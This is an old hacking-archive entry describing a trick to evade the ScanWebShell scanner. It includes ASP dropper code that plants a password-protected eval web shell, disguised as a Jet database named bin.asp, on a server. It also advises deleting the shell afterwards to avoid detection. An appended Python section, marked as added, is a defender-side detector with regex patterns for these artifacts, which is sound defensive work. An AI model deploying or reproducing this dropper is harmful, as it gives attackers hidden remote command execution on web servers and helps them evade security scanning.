A small trick for evading ScanWebShell

ID MYHACK58:62200714771
Type myhack58
Reporter Anonymous
Modified 2007-03-29T00:00:00


Method of use: requesting xxx.asp?bin=zs directly generates a bin.asp in the current directory. The connection password is zs. PS: this file evades ScanWebShell, but the generated bin.asp will be detected, so delete bin.asp after use.

<% pass="zs" If request("bin")= pass then shell = "bin. asp" Connstr="Provider=Microsoft. Jet. OLEDB. 4. 0;Data Source="&Server. MapPath(shell) set connad=server. createobject("adox. catalog") connad. create connstr Set conn=server. createobject("Adodb. Connection") conn. open connstr conn. execute("create table cmd(a shell text)") conn. execute("insert into cmd (the shell) values ('<"&Chr("3 7")&"e"&"val+request("""&pass&""")"&chr("3 7")&">')") End If %>
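A defender-side check for the two artifacts this entry describes, added here as an example and not part of the original page: a Jet database written under a script extension (the generated bin.asp), and script source that combines ADOX catalog creation, the Jet provider, `Server.MapPath` and a `Chr(37)`-assembled delimiter (the file that slips past the scanner). The extension set, the three-trait threshold and the sample file names are assumptions, and the samples are constructed fragments.

```python
import re
import tempfile
from pathlib import Path

# Jet 3/4 database files start with 00 01 00 00 followed by this ASCII tag.
JET_MAGIC = b"\x00\x01\x00\x00Standard Jet DB"
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}  # assumed script-mapped extensions

# Source traits of the dropper on this page. Whitespace-tolerant, because the
# page's copy carries stray spaces inside identifiers and in Chr("3 7").
TRAITS = {
    "adox_catalog": re.compile(rb"adox\s*\.\s*catalog", re.I),
    "jet_provider": re.compile(rb"jet\s*\.\s*oledb", re.I),
    "mappath": re.compile(rb"server\s*\.\s*mappath", re.I),
    "chr37_delimiter": re.compile(rb'chr\s*\(\s*"?3\s*7"?\s*\)', re.I),
}

def classify(path):
    """Return the list of findings for one file (empty list means clean)."""
    data = Path(path).read_bytes()
    findings = []
    if Path(path).suffix.lower() in SCRIPT_EXTS and data.startswith(JET_MAGIC):
        findings.append("jet_db_with_script_extension")
    hits = [name for name, rx in TRAITS.items() if rx.search(data)]
    if "adox_catalog" in hits and len(hits) >= 3:  # threshold is an assumption
        findings.append("adox_dropper_source")
    return findings

def scan(root):
    flagged = {}  # file name -> findings, for script files under root
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTS:
            found = classify(p)
            if found:
                flagged[p.name] = found
    return flagged

def demo():
    """Run the scan over constructed samples (fragments, not working scripts)."""
    samples = {
        "bin.asp": JET_MAGIC + b"\x00" * 64,
        "upload.asp": b'x=Server.MapPath(f)\nadox.catalog\nJet.OLEDB\nChr("3 7")\n',
        "index.asp": b'<% Response.Write("hello") %>',
        "data.mdb": JET_MAGIC + b"\x00" * 64,
    }
    with tempfile.TemporaryDirectory() as d:
        for name, body in samples.items():
            Path(d, name).write_bytes(body)
        return scan(d)
```

A legitimate database kept under its own `.mdb` extension is not flagged; only a Jet header behind a script-mapped extension is.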